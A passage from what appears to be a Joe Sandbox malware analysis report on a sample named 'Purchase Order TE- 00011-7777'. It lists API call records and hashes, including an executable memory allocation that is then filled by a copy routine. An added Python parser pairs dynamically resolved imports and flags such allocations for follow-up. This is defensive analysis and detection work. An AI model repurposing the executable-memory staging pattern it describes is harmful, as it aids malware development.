                      • Instruction Fuzzy Hash: 6CE0B6746A8700ABEB20BF71ED0DB953AA8BB00703F500098F609F31B1DFB845408B16
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LocalTime__swprintf
                      • String ID: %.3d$WIN_XPe
                      • API String ID: 2070861257-2409531811
                      • Opcode ID: dc9c8402c99038c2bc742d0f966992897fef63e656a7c74a3681ceea044deca3
                      • Instruction ID: 1d831871766cc5807bab00bf3217e72491ee7599ebbde197908d9b1d43305439
                      • Opcode Fuzzy Hash: dc9c8402c99038c2bc742d0f966992897fef63e656a7c74a3681ceea044deca3
                      • Instruction Fuzzy Hash: B4E01271D0801CFACB14C6908D86EFA77FCAB08300F5084D3B91692095DB359B54AB21
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00AAE69C,75920AE0,00AAE5AC,00B2DC28,?,?), ref: 00AAE6B4
                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AAE6C6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetNativeSystemInfo$kernel32.dll
                      • API String ID: 2574300362-192647395
                      • Opcode ID: e302f65b495798f5b3ae1b6ac37af5aeead3143ee139ffc8b98d252c2e10877e
                      • Instruction ID: 4b26311fe15767715f5a078f2f62067d53928b817966ac081df591369fbb5726
                      • Opcode Fuzzy Hash: e302f65b495798f5b3ae1b6ac37af5aeead3143ee139ffc8b98d252c2e10877e
                      • Instruction Fuzzy Hash: 48D0A7744803129FD7219F31E80874237E4AFA8305B409859F485E31B4DB70C4809610
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00AAE6D9,?,00AAE55B,00B2DC28,?,?), ref: 00AAE6F1
                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00AAE703
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: IsWow64Process$kernel32.dll
                      • API String ID: 2574300362-3024904723
                      • Opcode ID: bd1e4a9747104594c8f6f7b5d2ca3f46f4a71e01decd7e82903dc2b65994afc9
                      • Instruction ID: 8a88891aedf7b20ed79b628c40a6a8c7cf8aad2e0666ee4b8691d2a7e0ab8105
                      • Opcode Fuzzy Hash: bd1e4a9747104594c8f6f7b5d2ca3f46f4a71e01decd7e82903dc2b65994afc9
                      • Instruction Fuzzy Hash: 21D0A974480322AFDB24AF22E84C7833BE8BF05300B40846AF495E32A0DBB0C8809A10
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00AEEBAF,?,00AEEAAC), ref: 00AEEBC7
                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AEEBD9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                      • API String ID: 2574300362-1816364905
                      • Opcode ID: 337e55e46259a5a0ffabe32f9c531069c0685e3b669512a2fdfdf7d2dd734a1c
                      • Instruction ID: 7bca46abd75a4807caf6d2a793440f72cfc06a56d79b34cbed93887cd56d0803
                      • Opcode Fuzzy Hash: 337e55e46259a5a0ffabe32f9c531069c0685e3b669512a2fdfdf7d2dd734a1c
                      • Instruction Fuzzy Hash: 1AD0A974444322AFD7209F32E849B8237E8AF04304BA0C46AF896E2370DFB0D8808A10
                      APIs
                      • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00AD1371,?,00AD1519), ref: 00AD13B4
                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00AD13C6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                      • API String ID: 2574300362-1587604923
                      • Opcode ID: a8b585cb4dd01a5574feeac863a956c9e6905c79cc48998850a4d7d5e6995deb
                      • Instruction ID: 9c81a4f32d2f26a46b6fa40d365a30605e5d440f87de3d6036e7b510b3c4f7fc
                      • Opcode Fuzzy Hash: a8b585cb4dd01a5574feeac863a956c9e6905c79cc48998850a4d7d5e6995deb
                      • Instruction Fuzzy Hash: C3D0A930800322BFD7254F24E80878237E9AB40704F40846AE496E2778DEB0C880AB10
                      APIs
                      • LoadLibraryA.KERNEL32(oleaut32.dll,?,00AD135F,?,00AD1440), ref: 00AD1389
                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00AD139B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RegisterTypeLibForUser$oleaut32.dll
                      • API String ID: 2574300362-1071820185
                      • Opcode ID: c659f067667e00944c5c0614235454ff3d78f5f5ffe1e3ab37a5aa58cbe81413
                      • Instruction ID: 04ebe441c479b87d4572fc123cf3ef61965009cfeab51ce0cd030cc34b11884e
                      • Opcode Fuzzy Hash: c659f067667e00944c5c0614235454ff3d78f5f5ffe1e3ab37a5aa58cbe81413
                      • Instruction Fuzzy Hash: C8D0A730800322BFD7300F24E80878137D4AF04704F08845AE486E2760DA70CA809710
                      APIs
                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00AF3AC2,?,00AF3CF7), ref: 00AF3ADA
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AF3AEC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RegDeleteKeyExW$advapi32.dll
                      • API String ID: 2574300362-4033151799
                      • Opcode ID: bee2754c11f49b8d0100ce4f3987edadb93fb4ad664df3c1baa0e36f0443599f
                      • Instruction ID: aeaa31b79e7753ded9f02b073be5af47c610360657d3d14fc2ad24a570518a2c
                      • Opcode Fuzzy Hash: bee2754c11f49b8d0100ce4f3987edadb93fb4ad664df3c1baa0e36f0443599f
                      • Instruction Fuzzy Hash: 59D0A931441323AFDB20AFB2E80E79637E8AB11304B0084A9F9D5E2260EFF0C9908A10
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bb22fb066b19f3464fa3ce1adce48e39fe6c3a236fa3e26f3c78497a3bc8d37
                      • Instruction ID: f3fa42ce0f739344cd6c00ea0a8a83912b2206d6cc52873a73a6019ba41613c1
                      • Opcode Fuzzy Hash: 5bb22fb066b19f3464fa3ce1adce48e39fe6c3a236fa3e26f3c78497a3bc8d37
                      • Instruction Fuzzy Hash: 17C14975A0021AEBCB14CFA4C984FBEB7B5FF58708F118599E912AB251D730DE41CBA1
                      APIs
                      • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00AE6AA6), ref: 00A9AB2D
                      • _wcscmp.LIBCMT ref: 00A9AB49
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharUpper_wcscmp
                      • String ID:
                      • API String ID: 820872866-0
                      • Opcode ID: 901ddabcbdaeb9e7bc617a052abe6e33e8138b652836286d197576631686b6f1
                      • Instruction ID: a487ea214d0bb0ccef3b684f1b4cbca6fbe32a5ab9fe838f5116b48215eec9b1
                      • Opcode Fuzzy Hash: 901ddabcbdaeb9e7bc617a052abe6e33e8138b652836286d197576631686b6f1
                      • Instruction Fuzzy Hash: DBA1F27570010A9BDF14DF65EA816AEBBF1FF58300F6485AAEC5687290EB309C70D782
                      APIs
                      • CharLowerBuffW.USER32(?,?), ref: 00AF0D85
                      • CharLowerBuffW.USER32(?,?), ref: 00AF0DC8
                        • Part of subcall function 00AF0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00AF0478
                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00AF0FB2
                      • _memmove.LIBCMT ref: 00AF0FC2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharLower$AllocVirtual_memmove
                      • String ID:
                      • API String ID: 3659485706-0
                      • Opcode ID: dc715b29a22e04274e471dab1e86546a5f1515624566860b09d0f33cedddb400
                      • Instruction ID: 232d69335450256a60055e67dd948332124639f6399325b29723ca76df1a327c
                      • Opcode Fuzzy Hash: dc715b29a22e04274e471dab1e86546a5f1515624566860b09d0f33cedddb400
                      • Instruction Fuzzy Hash: 72B19B716043048FCB14DF68C98096ABBE4EF89754F14886EF98ADB352DB31ED46CB91
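Two things in this stretch of the listing are worth extracting mechanically rather than by eye: the run of LoadLibrary/GetProcAddress stubs in the entries above (combase.dll RoInitialize and RoUninitialize, kernel32.dll GetNativeSystemInfo, IsWow64Process and GetSystemWow64DirectoryW, oleaut32.dll RegisterTypeLibForUser and UnRegisterTypeLibForUser, advapi32.dll RegDeleteKeyExW), and the VirtualAlloc(0, 0x77, MEM_COMMIT, PAGE_EXECUTE_READWRITE) that is immediately followed by _memmove in the entry just above. The Python below is an added example and is not part of the Joe Sandbox report or its tooling. It parses the report's own "APIs" records (the sample input is constructed from lines copied from the entries above), pairs each LoadLibrary* call with the GetProcAddress that follows it to give the list of imports the binary resolves at run time, and flags executable allocations that a copy routine writes into. Where the tracer did not log the export name as a GetProcAddress argument (the combase.dll stubs), the name is recovered from the identifier left in the recorded stack slots of the LoadLibraryExW call; that recovery, and the hex-versus-identifier test behind it, are heuristics of this example and an assumption about how the tracer prints arguments.

```python
"""Parse Joe Sandbox 'APIs' records: pair LoadLibrary* with the following
GetProcAddress, and flag VirtualAlloc calls that request executable memory."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: records copied from the report entries above,
# in the report's own "• Api.Module(args), ref: addr" form.
SAMPLE_RECORDS = """\
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AB3028,?), ref: 00AB2F79
• GetProcAddress.KERNEL32(00000000), ref: 00AB2F80
• LoadLibraryA.KERNEL32(kernel32.dll,?,00AAE69C,75920AE0,00AAE5AC,00B2DC28,?,?), ref: 00AAE6B4
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AAE6C6
• LoadLibraryA.KERNEL32(kernel32.dll,?,00AAE6D9,?,00AAE55B,00B2DC28,?,?), ref: 00AAE6F1
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00AAE703
• LoadLibraryA.KERNEL32(oleaut32.dll,?,00AD135F,?,00AD1440), ref: 00AD1389
• GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00AD139B
• LoadLibraryA.KERNEL32(advapi32.dll,?,00AF3AC2,?,00AF3CF7), ref: 00AF3ADA
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AF3AEC
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00AF0FB2
• _memmove.LIBCMT ref: 00AF0FC2
"""

# "• Name.Module(args), ref: ADDR", or "• Name.Module ref: ADDR" for CRT calls.
RECORD_RE = re.compile(r"^\s*•\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")
IDENT_RE = re.compile(r"^[A-Za-z_]\w*$")

# Formal parameter counts: the tracer also prints stack slots past the real arguments.
LOADLIB_PARAMS = {"LoadLibraryA": 1, "LoadLibraryW": 1, "LoadLibraryExA": 3, "LoadLibraryExW": 3}
COPY_ROUTINES = {"_memmove", "_memcpy", "memcpy", "memmove", "RtlMoveMemory"}
PAGE_EXECUTE_MASK = 0xF0  # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY

@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: str

@dataclass(frozen=True)
class ResolvedImport:
    library: str
    symbol: Optional[str]
    ref: str  # call site of the GetProcAddress

@dataclass(frozen=True)
class ExecAlloc:
    ref: str
    size: int
    protect: int
    copied_into: bool  # a copy routine is the very next record

def parse_records(text: str) -> List[ApiCall]:
    """Non-record lines (e.g. 'Part of subcall function ...') are skipped."""
    calls = []
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if m:
            name, module, argstr, ref = m.groups()
            args = tuple(a.strip() for a in argstr.split(",")) if argstr else ()
            calls.append(ApiCall(name, module, args, ref.upper()))
    return calls

def _looks_like_symbol(tok: str) -> bool:
    # An export name: an identifier that is not a hex literal, '?' or a file name.
    return tok != "?" and "." not in tok and not HEX_RE.match(tok) and IDENT_RE.match(tok) is not None

def pair_dynamic_imports(calls: List[ApiCall]) -> List[ResolvedImport]:
    """Symbol from GetProcAddress's 2nd argument when logged; otherwise (heuristic)
    the first identifier in the preceding LoadLibrary's stack residue."""
    out, pending = [], None
    for c in calls:
        if c.name in LOADLIB_PARAMS:
            pending = c
        elif c.name == "GetProcAddress" and pending is not None:
            symbol = c.args[1] if len(c.args) > 1 and _looks_like_symbol(c.args[1]) else None
            if symbol is None:
                residue = pending.args[LOADLIB_PARAMS[pending.name]:]
                symbol = next((t for t in residue if _looks_like_symbol(t)), None)
            out.append(ResolvedImport(pending.args[0].lower(), symbol, c.ref))
            pending = None
    return out

def flag_exec_allocs(calls: List[ApiCall]) -> List[ExecAlloc]:
    """VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect); VirtualAllocEx
    has a leading hProcess. Flag any allocation whose flProtect is executable."""
    out = []
    for i, c in enumerate(calls):
        if c.name not in ("VirtualAlloc", "VirtualAllocEx"):
            continue
        off = 1 if c.name == "VirtualAllocEx" else 0
        try:
            size, protect = int(c.args[1 + off], 16), int(c.args[3 + off], 16)
        except (IndexError, ValueError):
            continue  # argument not recorded ('?')
        if protect & PAGE_EXECUTE_MASK:
            nxt = calls[i + 1].name if i + 1 < len(calls) else ""
            out.append(ExecAlloc(c.ref, size, protect, nxt in COPY_ROUTINES))
    return out

if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for imp in pair_dynamic_imports(recs):
        print(f"{imp.ref}  {imp.library}!{imp.symbol}")
    for a in flag_exec_allocs(recs):
        print(f"{a.ref}  size=0x{a.size:x} protect=0x{a.protect:02x} copied_into={a.copied_into}")
```

Every name the pairing recovers is an API that is absent on older Windows releases, and the string "WIN_XPe" a few entries up shows the code carries OS-version tables, so the LoadLibrary/GetProcAddress pattern by itself reads as version-compatibility shimming of the kind legitimate runtimes also do, not as import hiding. The RWX allocation of 0x77 bytes that _memmove fills immediately afterwards is the record to follow up on, together with the thread-injection, foreign-memory-write and direct-syscall signatures listed at the top of the report.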
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 00AEAF56
                      • CoUninitialize.OLE32 ref: 00AEAF61
                        • Part of subcall function 00AD1050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AD10B8
                      • VariantInit.OLEAUT32(?), ref: 00AEAF6C
                      • VariantClear.OLEAUT32(?), ref: 00AEB23F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                      • String ID:
                      • API String ID: 780911581-0
                      • Opcode ID: d2752579360190bf1b359f741a265bf33abfa310ea9a912d4ea7d3c0afce5fe1
                      • Instruction ID: 24970170b7df5165ba4a19ea64036902233bef72e852da57606d73483d30004b
                      • Opcode Fuzzy Hash: d2752579360190bf1b359f741a265bf33abfa310ea9a912d4ea7d3c0afce5fe1
                      • Instruction Fuzzy Hash: 5AA189356047429FCB10DF19C995B5AB7E4BF89320F048559FA9AAB3A1CB30FD40CB92
                      APIs
                      • _memmove.LIBCMT ref: 00A9C419
                      • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00AD6653,?,?,00000000), ref: 00A9C495
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: FileRead_memmove
                      • String ID:
                      • API String ID: 1325644223-0
                      • Opcode ID: 59ba8c210ba1062b7553b0d4d40197b5339db5e85158dbae26ecc578bab2769e
                      • Instruction ID: a9faf03b9e05a20d2ced600df4d91df6c0c172f7ec9856dfb0c62b98a61649d5
                      • Opcode Fuzzy Hash: 59ba8c210ba1062b7553b0d4d40197b5339db5e85158dbae26ecc578bab2769e
                      • Instruction Fuzzy Hash: FDA1AA70A04A19EBDF00CF69C984BAAFBF0FF05310F14C695E8659B291D731E960DB91
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                      • String ID:
                      • API String ID: 3877424927-0
                      • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                      • Instruction ID: f936437cd0925dba6c0f98e6ef1353e13b117e172422a7b9ef749a1ccfb2ed6b
                      • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                      • Instruction Fuzzy Hash: 0C519430A003059FDF248FA989806EE77FDAF48360F288729F8759A2D3D7709D619B40
                      APIs
                      • GetWindowRect.USER32(0138A458,?), ref: 00AFC354
                      • ScreenToClient.USER32(?,00000002), ref: 00AFC384
                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00AFC3EA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$ClientMoveRectScreen
                      • String ID:
                      • API String ID: 3880355969-0
                      • Opcode ID: e4edc803501fef75fa045dd7e6eb95a343cac85b9ea957d863790061443a8e95
                      • Instruction ID: 9d69c32abb9f5d3478cde2fc65e1c28e8653b7c93024d775e6b9ed50928d301e
                      • Opcode Fuzzy Hash: e4edc803501fef75fa045dd7e6eb95a343cac85b9ea957d863790061443a8e95
                      • Instruction Fuzzy Hash: A2515E7190020CEFCF20DFA9C984ABE7BB6BB45361F208659FA159B291D770ED41CB90
                      APIs
                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00ACD258
                      • __itow.LIBCMT ref: 00ACD292
                        • Part of subcall function 00ACD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00ACD549
                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00ACD2FB
                      • __itow.LIBCMT ref: 00ACD350
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$__itow
                      • String ID:
                      • API String ID: 3379773720-0
                      • Opcode ID: 411978e5c2f3fb6bd7c4c4dea69985aef342b9a99261be9ca236a74cce21362a
                      • Instruction ID: ef7afff2ac138046127a9bf73c1930dcfc00b914aa2ccfd0f9d393ec2468a55d
                      • Opcode Fuzzy Hash: 411978e5c2f3fb6bd7c4c4dea69985aef342b9a99261be9ca236a74cce21362a
